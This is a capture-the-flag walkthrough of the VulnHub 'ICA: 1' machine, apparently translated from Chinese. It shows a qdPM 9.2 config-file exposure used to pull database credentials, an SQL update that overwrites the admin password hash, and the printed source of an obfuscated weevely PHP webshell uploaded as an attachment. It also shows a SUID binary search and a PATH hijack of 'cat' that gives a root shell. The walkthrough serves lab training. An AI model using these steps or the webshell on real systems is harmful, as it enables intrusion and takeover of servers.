- Product Name:ICA: 1
- Chinese name: ICA: 1
- Published date: September 25, 2021
- Difficulty: Easy
- Description: Based on information from our intelligence network, the ICA is working on a secret project. We need to figure out what this project is. Once you have access information, please send it to us. We'll put a backdoor to access the system later. You just have to focus on what the project is. You may have to go through several layers of security. The IAEA is confident that you will succeed in this task. Good luck, agent!
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. Deployment information (IP address: 192.168.199.168)
Boot
2. Port scanning, ports 22, 80, 3306 are opened, and there is also a salt of the database
Salt: O*IDsu\x1B Zp4BOQ#,Uo,S
Port scanning
3. View the homepage, which is a login page and requires an email address and password
🔥 Home page
4. Try to scan other directories of the website to get the installation directory of the website
The directory where the website is installed
5. Try to query the qdPM 9.2 system vulnerability
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
We would like to mention the qdPM 9.2 vulnerability
6. Check the exploits
The password and connection string for the database are stored in a yml file.
To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
数据库的密码和连接字符串存储在 yml 文件中。 要访问 yml 文件,
您可以访问 http://<website>/core/config/databases.yml 文件并下载。
Exploit methods
7. Download the yaml file and mention the username and password
qdpmadmin
UcVQCMQk2STVeS6J
Username and password
8. Log in to the MySQL database
mysql -h 192.168.199.168 -u qdpmadmin -p
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
Enter the database
5. Go to the qdpm database and view the tables
MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [qdpm]> show tables;
+----------------------+
| Tables_in_qdpm |
+----------------------+
| attachments |
| configuration |
| departments |
| discussions |
| discussions_comments |
| discussions_reports |
| discussions_status |
| events |
| extra_fields |
| extra_fields_list |
| phases |
| phases_status |
| projects |
| projects_comments |
| projects_phases |
| projects_reports |
| projects_status |
| projects_types |
| tasks |
| tasks_comments |
| tasks_groups |
| tasks_labels |
| tasks_priority |
| tasks_status |
| tasks_types |
| tickets |
| tickets_comments |
| tickets_reports |
| tickets_status |
| tickets_types |
| user_reports |
| users |
| users_groups |
| versions |
| versions_status |
+----------------------+
35 rows in set (0.021 sec)
6. Check the configuration table, and mention the username and password of the website, but you can't log in
| 1 | app_administrator_email | [email protected] |
| 2 | app_administrator_password | $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0
View the table contents
7. Since it is impossible to crack the administrator's password, the password can be changed
$P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 The length is 34 characters, which is not generated by a simple Hash, but crypt(3) Hash, which is a one-way hash function based on the improved DES algorithm, which is a crypt(3) Hash backup with the plaintext "ailx10", and updates the password
MySQL [qdpm]> update configuration set value="$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0" where id=2;
Query OK, 1 row affected (0.007 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Create a new password
8. Successfully log in to the administrator web page
用户名:[email protected]
密码:ailx10
Log in to the administrator console successfully
9. Try file upload, new users can upload avatars
Add a new user
But only pictures can be seen
Uploaded images
10. Switch to ailx10, a new user, and find that you can upload attachments, make webshell files and upload them
┌──(ailx10㉿kali)-[~]
└─$ weevely generate ailx10 ./ailx10.php
Generated './ailx10.php' with password 'ailx10' of 771 byte size.
┌──(ailx10㉿kali)-[~]
└─$ cat ailx10.php
<?php
$k='$k="83b70Yz5Yz04";$kYzh="e0d874Yz2ddYz5Yzb6";$kf="Yz6e6962eb8aYz35";$p=Yz"VkTYzVUW2Z';
$I='Yz(@baYzse64_decoYzde($mYz[1]),$k))Yz);$Yzo=@oYzb_get_Yzcontents()Yz;@ob_endYz_cleaYzn';
$G='zYzntYzents("php:Yz//input"),$Yzm)==1) {@obYz_Yzstart();@eYzval(@YzgzuncoYzmpress(@x';
$O='z"Yz;Yzfor(Yz$i=0;$i<$l;){for($j=0;($j<Yz$c&&Yz$i<$l);$jYz++,$i+Yz+Yz){$o.=$t{$i}Yz^$k{';
$s=str_replace('ij','','cijreatije_ijfuijncijijtion');
$P='$j}Yz;}}rYzeYzturn $o;Yz}if Yz(@prYzeg_matcYzh("Yz/$kh(.+)$YzkYzf/"Yz,@file_get_coY';
$i='MYzT1JVyFr";fYzuYzYznction x($t,$k)Yz{$c=sYztYzrlen($k);$l=sYztrlYzen($t);Yz$o="YzY';
$N='();$Yzr=@base6Yz4_eYzncodYze(@x(Yz@gzcoYzmpress($o),$YzkYz));print("$pYz$kh$rYz$kf");}';
$J=str_replace('Yz','',$k.$i.$O.$P.$G.$I.$N);
$m=$s('',$J);$m();
?>
Upload attachments
11. Successfully obtain webshell
weevely http://192.168.199.168/uploads/attachments/575837-ailx10.php ailx10
Get a webshell
12. Look for suspicious files and find /opt/get_access
find / -perm -u=s 2>&1 | grep -v "Permission denied"
Look for suspicious files
13. The file was analyzed, and it was found that cat /root/system.info was executed
www-data@debian:/home $ ls -hl /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25 2021 /opt/get_access
www-data@debian:/home $ /opt/get_access
############################
######## ICA #######
### ACCESS TO THE SYSTEM ###
############################
Server Information:
- Firewall: AIwall v9.5.2
- OS: Debian 11 "bullseye"
- Network: Local Secure Network 2 (LSN2) v 2.4.1
All services are disabled. Accessing to the system is allowed only within working hours.
www-data@debian:/home $ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3#34;
GCC: (Debian 10.2.1-6) 10.2.1 20210110
14. Try to set the environment variable, but find that this shell does not have this ability
更新cat 命令为shell
echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat
Try setting environment variables
15. The webshell ability is very weak, so replace it with a rebound shell and successfully set the environment variables
┌──(root㉿kali)-[/home/ailx10]
└─# find / -name "php-reverse-shell.php" 2>/dev/null
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
Bounce the shell and set the environment variables
16. Successfully advanced to root permission
Get root access
17. Find 2 flags, one for ordinary users and one for privileged users
2 flags
At this point, the experiment is complete~